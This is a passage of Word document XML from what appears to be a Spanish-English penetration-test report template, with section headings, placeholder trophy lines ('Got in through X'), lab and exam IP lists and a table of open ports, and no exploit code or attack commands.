          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> o simplemente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">) y una instancia de Parrot Linux con todas las herramientas necesarias para inspeccionar y atacar a la susodicha máquina objetivo (en adelante, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">atacante </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>attack box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:eastAsia="Roboto Regular" w:cs="Roboto Regular" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
        </w:rPr>
        <w:t>). Los pasos son como proceden:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial Unicode MS" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="__RefHeading___Toc384_3166141552"/>
      <w:bookmarkStart w:id="8" w:name="_Toc59959350"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">2.0 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Resumen operativo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="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r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
        </w:rPr>
        <w:t>THINC.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain. John</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>’s overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>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pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Lab Trophy 1 – Got in through X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Lab Trophy 2 – Got in through X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Lab Trophy 3 – Got in through X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Exam Trophy 1 – Got in through X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:lineRule="auto" w:line="360"/>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Exam Trophy 2 – Got in through X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Cambria" w:cs="Cambria"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Cambria" w:cs="Cambria" w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="__RefHeading___Toc386_3166141552"/>
      <w:bookmarkStart w:id="10" w:name="_Toc59959351"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Bold" w:cs="Roboto Bold" w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="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pPr>
        <w:pStyle w:val="Ttulo"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="__RefHeading___Toc388_3166141552"/>
      <w:bookmarkStart w:id="12" w:name="_Toc59959352"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">3.0 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Roboto Bold" w:cs="Roboto Bold" w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Metodologías</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="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pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="__RefHeading___Toc390_3166141552"/>
      <w:bookmarkStart w:id="14" w:name="_Toc59959353"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Obtención de información</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="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pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Lab Network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>192.168.1.1, 192.168.1.2, 192.168.1.3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Exam Network</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>172.16.203.133, 172.16.203.134, 172.16.203.135, 172.16.203.136</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="__RefHeading___Toc392_3166141552"/>
      <w:bookmarkStart w:id="16" w:name="_Toc59959354"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Enumeración de servicios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="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jc w:val="left"/>
        <w:tblInd w:w="79" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="80" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="80" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstRow="1" w:noVBand="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:val="04a0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4727"/>
        <w:gridCol w:w="4726"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="454" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4727" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="AA0716" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
                <w:color w:val="FFFFFF"/>
                <w:u w:val="none" w:color="FFFFFF"/>
              </w:rPr>
              <w:t>Server IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4726" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="FFFFFF"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:shd w:color="auto" w:fill="AA0716" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="360" w:before="0" w:after="200"/>
              <w:jc w:val="center"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
                <w:color w:val="FFFFFF"/>
                <w:u w:val="none" w:color="FFFFFF"/>
              </w:rPr>
              <w:t>Ports Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="454"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before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>192.168.1.1</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before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>TCP:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> 21,22,25,80,443</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="454"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before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>192.168.1.2</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before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>TCP:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> 22,55,90,8080,80</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="947"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before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>192.168.1.3</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spacing w:lineRule="auto" w:line="240"/>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:eastAsia="Roboto Regular" w:cs="Roboto Regular"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t>TCP:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t xml:space="preserve"> 1433,3389 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="BodyA"/>
              <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="200"/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
              </w:rPr>
              <w:t xml:space="preserve">UDP: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
              </w:rPr>
              <w:t>1434,161</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:lineRule="auto" w:line="240" w:before="0" w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold" w:eastAsia="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="__RefHeading___Toc394_3166141552"/>
      <w:bookmarkStart w:id="18" w:name="_Toc59959355"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:color w:val="000000"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Intrusión</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyA"/>
        <w:spacing w:lineRule="auto" w:line="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>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pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial Unicode MS" w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="none" w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9356" w:type="dxa"/>
        <w:jc w:val="left"/>
        <w:tblInd w:w="79" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="80" w:type="dxa"/>
          <w:left w:w="80" w:type="dxa"/>
          <w:bottom w:w="80" w:type="dxa"/>
          <w:right w:w="80" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:firstRow="1" w:noVBand="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:val="04a0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9030"/>
        <w:gridCol w:w="325"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="11440" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9030" w:type="dxa"/>
            <w:tcBorders>
